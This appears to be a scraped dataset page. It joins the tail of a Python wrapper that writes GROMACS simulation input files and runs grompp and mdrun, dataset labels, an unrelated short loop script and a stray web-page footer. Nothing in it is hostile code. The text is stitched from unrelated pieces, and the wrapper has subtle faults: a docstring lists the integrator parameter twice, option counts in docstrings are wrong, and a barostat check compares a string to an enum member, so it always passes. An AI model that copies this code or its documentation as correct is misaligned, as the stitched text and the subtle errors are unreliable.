self._control["nsteps"] = 5000
self._control["nstxout"] = 500
self._control["nstlog"] = 500
self._control["nstenergy"] = 500
self._control["nstcalcenergy"] = 500
self._constraints = OrderedDict()
self._constraints["constraint-algorithm"] = "lincs"
self._constraints["constraints"] = self.Constraints.HBonds.value
self._constraints["lincs_iter"] = 1
self._constraints["lincs_order"] = 4
self._nb_method = OrderedDict()
self._nb_method["cutoff-scheme"] = "Verlet"
self._nb_method["ns-type"] = "grid"
self._nb_method["nstlist"] = 10
self._nb_method["rlist"] = 0.9
self._nb_method["rcoulomb"] = 0.9
self._nb_method["rvdw"] = 0.9
self._nb_method["coulombtype"] = "PME"
self._nb_method["pme_order"] = 4
self._nb_method["fourierspacing"] = 0.16
self._nb_method["vdwtype"] = "Cut-off"
self._nb_method["DispCorr"] = "EnerPres"
self._nb_method["pbc"] = "xyz"
def _config_min(self, optimizer):
"""
Configure input settings for a minimization run.
Parameters
----------
optimizer: :class:`GROMACS.Optimizer`, default=Optimizer.SteepestDescent
Algorithm for energy minimization, keyword in the parenthesis are the options for the input file.
**(1)** `SteepestDescent` (``steep``), **(2)** `ConjugateGradient` (``cg``), and **(3)** `Broyden`
(``l-bfgs``).
"""
self.constraints["continuation"] = "no"
self.control["integrator"] = optimizer.value
self.control["emtol"] = 10.0
self.control["emstep"] = 0.01
self.control["nsteps"] = 5000
def _config_md(self, integrator, thermostat):
"""
Configure input setting for a MD.
Parameters
----------
integrator: :class:`GROMACS.Integrator`, default=Integrator.LeapFrog
Option to choose the integrator for the MD simulations, keywords in the parenthesis are the options for the
input file. **(1)** `LeapFrog` (``md``), **(2)** `VelocityVerlet` (``md-vv``),
**(3)** `VelocityVerletAveK` (``md-vv-avek``), **(4)** `LangevinDynamics` (``sd``), and **(5)**
`Brownian Dynamics` (``bd``).
integrator: :class:`GROMACS.Integrator`, default=Integrator.LeapFrog
Option to choose the integrator for the MD simulations, keywords in the parenthesis are the options for the
input file. **(1)** `LeapFrog` (``md``), **(2)** `VelocityVerlet` (``md-vv``),
**(3)** `VelocityVerletAveK` (``md-vv-avek``), **(4)** `LangevinDynamics` (``sd``), and **(5)**
`Brownian Dynamics` (``bd``).
"""
self.control["dt"] = 0.002
self.control["integrator"] = integrator.value
self.constraints["continuation"] = "yes"
self.thermostat["tc-grps"] = "System"
self.thermostat["ref_t"] = self.temperature
if (
integrator != self.Integrator.LangevinDynamics
and integrator != self.Integrator.BrownianDynamics
):
self.thermostat["tcoupl"] = thermostat.value
self.thermostat["tau_t"] = 1.0
else:
self.thermostat["tau_t"] = 0.1
def config_vac_min(self, optimizer=Optimizer.SteepestDescent):
"""
Configure a reasonable input setting for a MD run in vacuum. `Users can override the parameters set by this
method.`
.. note ::
Newer versions of GMX no longer support a "True" vacuum simulation so we have to do this by creating a
"pseudo-PBC" environment. Make sure the coordinates ``.gro`` file has an expanded box, which you can do
using ``gmx editconf``. See the discussion on
https://gromacs.bioexcel.eu/t/minimization-in-vacuum-without-pbc/110/2.
Parameters
----------
optimizer: :class:`GROMACS.Optimizer`, default=Optimizer.SteepestDescent
Algorithm for energy minimization, keyword in the parenthesis are the options for the input file.
**(1)** `SteepestDescent` (``steep``), **(2)** `ConjugateGradient` (``cg``), and **(3)** `Broyden`
(``l-bfgs``).
"""
self.title = "Vacuum Minimization"
self._config_min(optimizer)
self.nb_method["pbc"] = "xyz"
self.nb_method["ns_type"] = "grid"
self.nb_method["nstlist"] = 10
self.nb_method["rlist"] = 333.3
self.nb_method["coulombtype"] = "Cut-off"
self.nb_method["rcoulomb"] = 333.3
self.nb_method["vdwtype"] = "Cut-off"
self.nb_method["rvdw"] = 333.3
self.nb_method["DispCorr"] = "no"
def config_vac_md(
self, integrator=Integrator.LeapFrog, thermostat=Thermostat.VelocityRescaling
):
"""
Configure a reasonable input setting for a MD run in vacuum. `Users can override the parameters set by this
method.`
.. note ::
Newer versions of GMX no longer support a "True" vacuum simulation so we have to do this by creating a
"pseudo-PBC" environment. Make sure the coordinates ``.gro`` file has an expanded box, which you set
using ``gmx editconf``. See the discussion on
https://gromacs.bioexcel.eu/t/minimization-in-vacuum-without-pbc/110/2.
Parameters
----------
integrator: :class:`GROMACS.Integrator`, default=Integrator.LeapFrog
Option to choose the integrator for the MD simulations, keywords in the parenthesis are the options for the
input file. **(1)** `LeapFrog` (``md``), **(2)** `VelocityVerlet` (``md-vv``),
**(3)** `VelocityVerletAveK` (``md-vv-avek``), **(4)** `LangevinDynamics` (``sd``), and **(5)**
`Brownian Dynamics` (``bd``).
thermostat: :class:`GROMACS.Thermostat`, default=Thermostat.VelocityRescaling
Option to choose one of five thermostat implemented in GROMACS, keywords in the parenthesis are the options
for the input file. **(1)** `Off` (``no``), **(2)** `Berendsen` (``berendsen``), **(3)** `NoseHoover`
(``nose-hoover``), **(4)** `Andersen1` (``andersen``), **(5)** `Andersen2` (``andersen-massive``),
and **(6)** `VelocityRescaling` (``v-rescale``).
"""
self.title = "Vacuum MD Simulation"
self._config_md(integrator, thermostat)
if self.checkpoint is None:
self.constraints["continuation"] = "no"
else:
self.constraints["continuation"] = "yes"
self.nb_method["pbc"] = "xyz"
self.nb_method["ns_type"] = "grid"
self.nb_method["nstlist"] = 10
self.nb_method["rlist"] = 333.3
self.nb_method["coulombtype"] = "Cut-off"
self.nb_method["rcoulomb"] = 333.3
self.nb_method["vdwtype"] = "Cut-off"
self.nb_method["rvdw"] = 333.3
self.nb_method["DispCorr"] = "no"
def config_pbc_min(self, optimizer=Optimizer.SteepestDescent):
"""
Configure a reasonable input setting for an energy minimization run with periodic boundary conditions. `Users
can override the parameters set by this method.`
Parameters
----------
optimizer: :class:`GROMACS.Optimizer`, default=Optimizer.SteepestDescent
Algorithm for energy minimization, keywords in the parenthesis are the options for the input file.
**(1)** `SteepestDescent` (``steep``), **(2)** `ConjugateGradient` (``cg``), and **(3)** `Broyden`
(``l-bfgs``).
"""
self.title = "PBC Minimization"
self._config_min(optimizer)
self.nb_method["nstlist"] = 10
def config_pbc_md(
self,
ensemble=Simulation.Ensemble.NPT,
integrator=Integrator.LeapFrog,
thermostat=Thermostat.VelocityRescaling,
barostat=Barostat.Berendsen,
):
"""
Configure a reasonable input setting for a MD run with periodic boundary conditions. `Users can override the
parameters set by this method.`
Parameters
----------
ensemble: :class:`Simulation.Ensemble`, default=Ensemble.NPT
Configure a MD simulation with NVE, NVT or NPT thermodynamic ensemble.
integrator: :class:`GROMACS.Integrator`, default=Integrator.LeapFrog
Option to choose the integrator for the MD simulations, keywords in the parenthesis are the options for the
input file. **(1)** `LeapFrog` (``md``), **(2)** `VelocityVerlet` (``md-vv``),
**(3)** `VelocityVerletAveK` (``md-vv-avek``), **(4)** `LangevinDynamics` (``sd``), and **(5)**
`Brownian Dynamics` (``bd``).
thermostat: :class:`GROMACS.Thermostat`, default=Thermostat.VelocityRescaling
Option to choose one of five thermostat implemented in GROMACS, keywords in the parenthesis are the options
for the input file. **(1)** `Off` (``no``), **(2)** `Berendsen` (``berendsen``), **(3)** `NoseHoover`
(``nose-hoover``), **(4)** `Andersen1` (``andersen``), **(5)** `Andersen2` (``andersen-massive``),
and **(6)** `VelocityRescaling` (``v-rescale``).
barostat: :class:`GROMACS.Barostat`, default=Barostat.Berendsen
Option to choose one of three barostat implemented in GROMACS, keywords in the parenthesis are the options
for the input file. **(1)** `Off` (``no``), **(2)** `Berendsen` (``berendsen``), **(3)** `ParrinelloRahman`
(``Parrinello-Rahman``), and **(4)** `MMTK` (``MTTK``).
"""
self.title = f"{ensemble.value} MD Simulation"
self._config_md(integrator, thermostat)
if self.checkpoint is None:
self.constraints["continuation"] = "no"
else:
self.constraints["continuation"] = "yes"
if ensemble == self.Ensemble.NVE:
self.thermostat["tcoupl"] = self.Thermostat.Off.value
self.barostat["pcoupl"] = self.Barostat.Off.value
del self.thermostat["tc-grps"]
del self.thermostat["ref_t"]
del self.thermostat["tau_t"]
elif ensemble == self.Ensemble.NVT:
self.thermostat["gen_vel"] = "yes"
self.thermostat["gen_temp"] = self.temperature
self.thermostat["gen_seed"] = -1
self.barostat["pcoupl"] = self.Barostat.Off.value
elif ensemble == self.Ensemble.NPT:
self.thermostat["gen_vel"] = "no"
self.barostat["pcoupl"] = barostat.value
if barostat.value != self.Barostat.Off:
self.barostat["pcoupltype"] = self.BoxScaling.Isotropic.value
self.barostat["tau_p"] = 2.0
self.barostat["ref_p"] = self.pressure
self.barostat["compressibility"] = 4.5e-5
@staticmethod
def _write_dict_to_mdp(f, dictionary):
"""
Write dictionary to file, following GROMACS format.
Parameters
----------
f : TextIO
File where the dictionary should be written.
dictionary : dict
Dictionary of values.
"""
for key, val in dictionary.items():
if val is not None and not isinstance(val, list):
f.write("{:25s} {:s}\n".format(key, "= " + str(val)))
elif isinstance(val, list):
f.write("{:25s} {:s}".format(key, "= "))
for i in val:
f.write("{:s} ".format(str(i)))
f.write("\n")
def _write_input_file(self):
"""
Write the input file specification to file.
"""
logger.debug("Writing {}".format(self.input))
with open(os.path.join(self.path, self.input), "w") as mdp:
mdp.write("{:25s} {:s}\n".format("title", "= " + self.title))
mdp.write("; Run control\n")
self._write_dict_to_mdp(mdp, self.control)
mdp.write("; Nonbonded options\n")
self._write_dict_to_mdp(mdp, self.nb_method)
mdp.write("; Bond constraints\n")
if self.constraints["constraint-algorithm"].lower() == "shake":
self._write_dict_to_mdp(
mdp,
get_dict_without_keys(
self.constraints, "lincs_iter", "lincs_order"
),
)
else:
self._write_dict_to_mdp(mdp, self.constraints)
if self.thermostat:
mdp.write("; Temperature coupling\n")
# Check if users specify different temperature groups
if self.tc_groups:
tau_t = self.thermostat["tau_t"]
self.thermostat["tc-grps"] = self.tc_groups
self.thermostat["tau_t"] = [tau_t] * len(self.tc_groups)
self.thermostat["ref_t"] = [self.temperature] * len(self.tc_groups)
self._write_dict_to_mdp(mdp, self.thermostat)
if self.barostat:
mdp.write("; Pressure coupling\n")
self._write_dict_to_mdp(mdp, self.barostat)
def run(self, run_grompp=True, overwrite=False, fail_ok=False):
"""
Method to run Molecular Dynamics simulation with GROMACS.
Parameters
----------
run_grompp: bool, optional, default=True
Run GROMPP to generate ``.tpr`` file before running MDRUN
overwrite: bool, optional, default=False
Whether to overwrite simulation files.
fail_ok: bool, optional, default=False
Whether a failing simulation should stop execution of ``pAPRika``.
"""
if overwrite or not self.check_complete():
# Check the type of simulation: Minimization, NVT or NPT
if self.control["integrator"] in [
self.Optimizer.SteepestDescent.value,
self.Optimizer.ConjugateGradient.value,
self.Optimizer.Broyden.value,
]:
logger.info("Running Minimization at {}".format(self.path))
elif self.control["integrator"] in [
self.Integrator.LeapFrog.value,
self.Integrator.VelocityVerlet.value,
self.Integrator.VelocityVerletAveK.value,
self.Integrator.LangevinDynamics.value,
self.Integrator.BrownianDynamics.value,
]:
if self.thermostat and self.barostat:
logger.info("Running NPT MD at {}".format(self.path))
elif not self.barostat:
logger.info("Running NVT MD at {}".format(self.path))
else:
logger.info("Running NVE MD at {}".format(self.path))
# Set Plumed kernel library to path
self._set_plumed_kernel()
# create executable list for GROMPP
# gmx grompp -f npt.mdp -c coordinates.gro -p topology.top -t checkpoint.cpt -o npt.tpr -n index.ndx
if run_grompp:
# Clean previously generated files
for file in glob.glob(os.path.join(self.path, f"{self.prefix}*")):
os.remove(file)
# Write MDF input file
self._write_input_file()
# GROMPP list
grompp_list = [self.executable, "grompp"]
grompp_list += [
"-f",
self.input,
"-p",
self.topology,
"-c",
self.coordinates,
"-o",
self.tpr,
"-po",
self.output,
"-maxwarn",
str(self.grompp_maxwarn),
]
if self.checkpoint:
grompp_list += ["-t", self.checkpoint]
if self.index_file:
grompp_list += ["-n", self.index_file]
# Run GROMPP
grompp_output = sp.Popen(
grompp_list,
cwd=self.path,
stdout=sp.PIPE,
stderr=sp.PIPE,
env=os.environ,
)
grompp_stdout = grompp_output.stdout.read().splitlines()
grompp_stderr = grompp_output.stderr.read().splitlines()
# Report any stdout/stderr which are output from execution
if grompp_stdout:
logger.info("STDOUT received from GROMACS execution")
for line in grompp_stdout:
logger.info(line)
# Not sure how to do this more efficiently/elegantly, "subprocess" seems to treat everything
# Gromacs spits out from "grompp" as an error.
if grompp_stderr and any(
["Error" in line.decode("utf-8").strip() for line in grompp_stderr]
):
logger.info("STDERR received from GROMACS execution")
for line in grompp_stderr:
logger.error(line)
# create executable list for MDRUN
# gmx_mpi mdrun -v -deffnm npt -nt 6 -gpu_id 0 -plumed plumed.dat
mdrun_list = []
# Add any user specified command
if self.custom_mdrun_command is not None:
if self.executable not in self.custom_mdrun_command:
mdrun_list += [self.executable]
if "mdrun" not in self.custom_mdrun_command:
mdrun_list += ["mdrun"]
mdrun_list += self.custom_mdrun_command.split()
# Output prefix
if "-deffnm" not in self.custom_mdrun_command:
mdrun_list += ["-deffnm", self.prefix]
# Add number of threads if not already specified in custom
if not any(
[
cpu in self.custom_mdrun_command
for cpu in ["-nt", "-ntomp", "-ntmpi", "-ntomp_pme"]
]
):
mdrun_list += [
"-ntomp" if "mpi" in self.executable else "-nt",
str(self.n_threads),
]
# Add gpu id if not already specified in custom
if (
self.gpu_devices is not None
and "-gpu_id" not in self.custom_mdrun_command
):
mdrun_list += ["-gpu_id", str(self.gpu_devices)]
# Add plumed file if not already specified in custom
if self.plumed_file and "-plumed" not in self.custom_mdrun_command:
mdrun_list += ["-plumed", self.plumed_file]
else:
mdrun_list += [self.executable, "mdrun", "-deffnm", self.prefix]
# Add number of threads
mdrun_list += [
"-ntomp" if "mpi" in self.executable else "-nt",
str(self.n_threads),
]
# Add gpu id
if self.gpu_devices is not None:
mdrun_list += ["-gpu_id", str(self.gpu_devices)]
# Add plumed file
if self.plumed_file is not None:
mdrun_list += ["-plumed", self.plumed_file]
# Run MDRUN
mdrun_output = sp.Popen(
mdrun_list,
cwd=self.path,
stdout=sp.PIPE,
stderr=sp.PIPE,
env=os.environ,
)
mdrun_out = mdrun_output.stdout.read().splitlines()
mdrun_err = mdrun_output.stderr.read().splitlines()
# Report any stdout/stderr which are output from execution
if mdrun_out:
logger.info("STDOUT received from MDRUN execution")
for line in mdrun_out:
logger.info(line)
# Same reasoning as before for "grompp".
if mdrun_err and any(
["Error" in line.decode("utf-8").strip() for line in mdrun_err]
):
logger.info("STDERR received from MDRUN execution")
for line in mdrun_err:
logger.error(line)
# Check completion status
if (
self.control["integrator"]
in [
self.Optimizer.SteepestDescent.value,
self.Optimizer.ConjugateGradient.value,
self.Optimizer.Broyden.value,
]
and self.check_complete()
):
logger.info("Minimization completed...")
elif self.check_complete():
logger.info("Simulation completed...")
else:
logger.info(
"Simulation did not complete when executing the following ...."
)
logger.info(" ".join(mdrun_list))
if not fail_ok:
raise Exception(
"Exiting due to failed simulation! Check logging info."
)
else:
logger.info(
"Completed output detected ... Skipping. Use: run(overwrite=True) to overwrite"
)
def check_complete(self, alternate_file=None):
"""
Check for the string "step N" in ``self.output`` file. If "step N" is found, then
the simulation completed.
Parameters
----------
alternate_file : os.PathLike, optional, default=None
If present, check for "step N" in this file rather than ``self.output``.
Default: None
Returns
-------
complete : bool
True if "step N" is found in file. False, otherwise.
"""
# Assume not completed
complete = False
if alternate_file:
output_file = alternate_file
else:
output_file = os.path.join(self.path, self.logfile)
if os.path.isfile(output_file):
with open(output_file, "r") as f:
strings = f.read()
if (
f" step {self.control['nsteps']} " in strings
or "Finished mdrun" in strings
):
complete = True
if complete:
logger.debug("{} has TIMINGS".format(output_file))
else:
logger.debug("{} does not have TIMINGS".format(output_file))
return complete
|
nilq/baby-python
|
python
|
a1 = int(input())
a2 = int(input())
n = int(input())
for p in range(a1, ord(chr(a2 - 1)) + 1):
for i in range(1, (n - 1) + 1):
for j in range(1, (int((n / 2) - 1)) + 1):
if (p % 2 != 0) and (((i + j + p) % 2) != 0):
print(f"{chr(p)}-{i}{j}{p}")
|
nilq/baby-python
|
python
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.